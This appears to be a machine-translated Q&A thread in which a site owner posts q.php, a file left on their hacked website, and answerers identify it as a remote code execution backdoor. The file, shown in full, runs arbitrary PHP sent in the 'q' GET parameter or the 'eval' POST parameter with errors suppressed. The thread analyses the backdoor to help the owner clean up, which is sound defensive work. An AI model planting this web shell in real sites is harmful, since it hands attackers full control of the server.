黑客网站异常php文件
我有一个名为q.php的文件,它出现在我的一个网站上。该网站已被黑客入侵。有人知道这个文件的作用吗黑客网站异常php文件,php,Php,我有一个名为q.php的文件,它出现在我的一个网站上。该网站已被黑客入侵。有人知道这个文件的作用吗 <? error_reporting(0); if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?> <?=eval(@$_GET['q']);?> <?php if (!isset($_POST['eval'])) {die('');} eval($_POST['eval']); ?>
<? error_reporting(0); if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(@$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
它似乎允许任何人执行在get请求中作为“q”参数传入的php代码,或POST请求的“eval”参数中的任何代码。它将抑制所有相关的错误
这是非常糟糕的,如果你的网站还没有关闭,我建议你将其脱机,并仔细检查你的服务器。它运行?q=GET参数或POST-eval参数中发送的PHP代码
我建议您清理服务器,重新开始安装。这将使攻击者能够执行任何代码 如果您通过URL中的
?q=code
或通过将代码包含到eval
参数中的POST请求中,将代码传递给该脚本,它将被执行
所以基本上这是一个远程代码执行后门。不错。不确定第一行是干什么用的,但这两行代码允许用户在您的服务器上分别通过url或post数据来执行他们喜欢的任何代码。更大的问题是攻击者最初是如何上传文件的。该文件包含的是插入的典型代码,攻击者可以在未经许可的情况下在服务器上执行代码 仅仅删除此文件和任何其他包含流氓代码的文件并不能解决问题,因为攻击者可以通过某种方式将文件上载到您的网站文件存储库中 无论如何,这里有一个完整的分类: 1/错误报告(0); 将错误报告设置为关闭 2/如果(@$_GET['wpth']){echo./mywebsite.co.uk/index.htm”;}?> 当用/?wpth结尾调用URL时,URL将在页面顶部回送 3/ 这将执行q值中包含的任何代码。i、 e.yourdomain.com/?q=base64_解码(%27SomeLongString%27) 4/如果(!isset($_POST['eval']){die('');} 如果未设置名为eval的post表单变量,则终止页面执行 5/评估($_POST['eval']);
执行从远程托管表单发布的任何代码,其中表单变量名为eval,这样可以方便地执行远程代码(无需额外上传,这显然也是可能的)。我猜它会加载一个html文件,其中包含目录列表或一些他们想要运行的常用函数。@MetalFrog-nah,echo只是把绳子吐了出来。我的钱花在那些不知道自己在做什么的孩子身上哦,对,不知道为什么我之前认为这是一个要求或包括。德普时刻。